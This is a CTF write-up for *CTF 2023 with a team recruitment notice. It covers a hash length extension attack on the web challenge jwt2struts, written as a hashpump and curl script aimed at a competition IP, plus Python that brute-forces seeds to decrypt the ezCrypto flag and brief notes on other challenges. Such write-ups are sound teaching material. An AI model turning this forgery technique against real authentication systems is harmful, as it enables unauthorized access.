*CTF 2023 writeup by Mini-Venom

招新小广告CTF组诚招re、crypto、pwn、misc、合约方向的师傅,长期招新IOT+Car+工控+样本分析多个组招人有意向的师傅请联系邮箱

[email protected](带上简历和想加入的小组)

Web

jwt2struts

Hash 拓展攻击，参考：https://www.freebuf.com/articles/database/164019.html

function exp(){
    local res=$(hashpump -s $1 -d $2 -k $3 -a orz)
    passwd=$(echo $res | awk '{print $2}' | sed 's/\x/%/g')
    digest=$(echo $res | awk '{print $1}')
    echo curl http://140.210.223.216:55557/JWT_key.php 
        -d "username=admin&password=$passwd" 
        --cookie digest=$digest
}

exp e6ccbf12de9d33ec27a5bcfb6a3293df root 19

得到flag

Crypto

ezCrypto

先爆破出map_string1、map_string3

import random
import string

map_string4= "W93VnRHs<CU#GI!d^7;'Lyfo`qt68&Y=Pr(b)O2[|mc0z}BvKkh5~lJeXM-iNgaTZ]*4F?upw>A,[email protected]:_$E/%"+{1"
def den(map_string4):
    for rseed in range(0,1001):
        assert rseed <= 1000 and rseed >= 0

        characters = string.printable[:-6]
        random.seed(rseed)
        random_sequence = random.sample(characters, len(characters))  # 将characters顺序打乱
        map_string1 = ''.join(random_sequence)

        random.seed(rseed * 2)
        random_sequence = random.sample(characters, len(characters))
        map_string2 = ''.join(random_sequence)

        random.seed(rseed * 3)
        random_sequence = random.sample(characters, len(characters))
        map_string3 = ''.join(random_sequence)
        if map_string2==map_string4:
            return map_string1,map_string2,map_string3,rseed
map_string1,map_string2,map_string3,rseed= den(map_string4)
print(map_string1)
print(map_string2)
print(map_string3)

求flag

from string import *
import random

map_string1=  "d*T[RJDKkbZ>"Fs&X}Q6:h7a{VUj#=Y1tLI~P^qBg9A.)Mz@frvGwn<ie,y|m;'3x54]8-p%W(oS!0lN`?2+H/_Euc$CO"
map_string2=  "W93VnRHs<CU#GI!d^7;'Lyfo`qt68&Y=Pr(b)O2[|mc0z}BvKkh5~lJeXM-iNgaTZ]*4F?upw>A,[email protected]:_$E/%"+{1"
map_string3=  ".2K6b@/~5+=l<7wXj8TaJ?]Z,CMRkY&gG(}tsf)Du^OUx-qdQNiyV$01L["moA*3P'IF#pnhe`;v>H:z%!c{|WEBS94_r"
rseed=  667
cipher="&I1}ty~A:bR>)Q/;6:*6`1;bum?8i[LL*t`1;bum?8i[LL?Ia`1;bum?8i[LL72;xl:mvHF"z4_/DD+c:mvHF"z4_/DDzbZ:mvHF"z4_/DDr}vS?"

def util1_re(c):
    return map_string3[c]

def decrypto2(str):
    newlist = []
    for i in str:
        index = map_string1.index(i)
        newlist.append(util1_re(index))
    return ''.join(newlist)

def decrypto3(str):
    newlist = []
    for i in str:
        index=map_string2.index(i)
        newlist.append(util1_re(index))
    return ''.join(newlist)

cipher1 = cipher[20:]
cipher2 = cipher[:20]
flaglist1=decrypto3(cipher1)[:len(decrypto3(cipher1))//2]
flaglist2=decrypto3(decrypto2(cipher2))
print(flaglist1)
print(flaglist2)
newlist1=['TDa','FRn']
newlist2=['F1nD1','s0m32','ln4','cR7PtO5']
characters = printable[:-6]
def util1(map_string: str, c):
    return map_string.index(c)

def Ran_str(seed : int, origin: str):
    random.seed(seed)
    random_sequence = random.sample(origin, len(origin))
    return ''.join(random_sequence)

def str_xor(s: str, k: str):
    return ''.join(chr((ord(a)) ^ (ord(b))) for a, b in zip(s, k))

def mess_sTr_re(s: str, index: int):
    map_str = Ran_str(index, ascii_letters + digits)
    new_str = str_xor(s, map_str[index])
    if not characters.find(new_str) >= 0:
        new_str = s
    return new_str, util1(map_str, new_str)

def mess_sTr(s: str, index: int):
    map_str = Ran_str(index, ascii_letters + digits)
    new_str = str_xor(s, map_str[index])
    if not characters.find(new_str) >= 0:
        new_str = s
    return new_str, util1(map_str, s)
index=1
newlist3=[]
for i in newlist1:
    if len(i) % 2 == 1:
        i1 = ""
        for j in range(len(i)):
            p, index = mess_sTr_re(i[j], index)
            i1 += p

        p, index = mess_sTr(i[0], index)
        newlist3.append(i1)
print(newlist3)
x=['TrY0', 'F4n3']
sorted_list = sorted(x+newlist2, key=lambda x: int(x[-1]))  #根据最后一个数字排序
flag=''
for i in sorted_list:
    if int(i[-1])!=len(sorted_list)-1:
        flag+=i[:-1]+'_'
    else:
        flag+=i[:-1]
print('sixstars{'+flag+'}')

Reverse:

GoGpt

简单的base64+xor，异或的字符经过置换，直接动调提取

Misc:

snippingTools

cve-2023-28303,直接恢复图片

old language

老滚5里的龙语照着翻译一下就行了

原文始发于微信公众号（ChaMd5安全团队）：*CTF 2023 writeup by Mini-Venom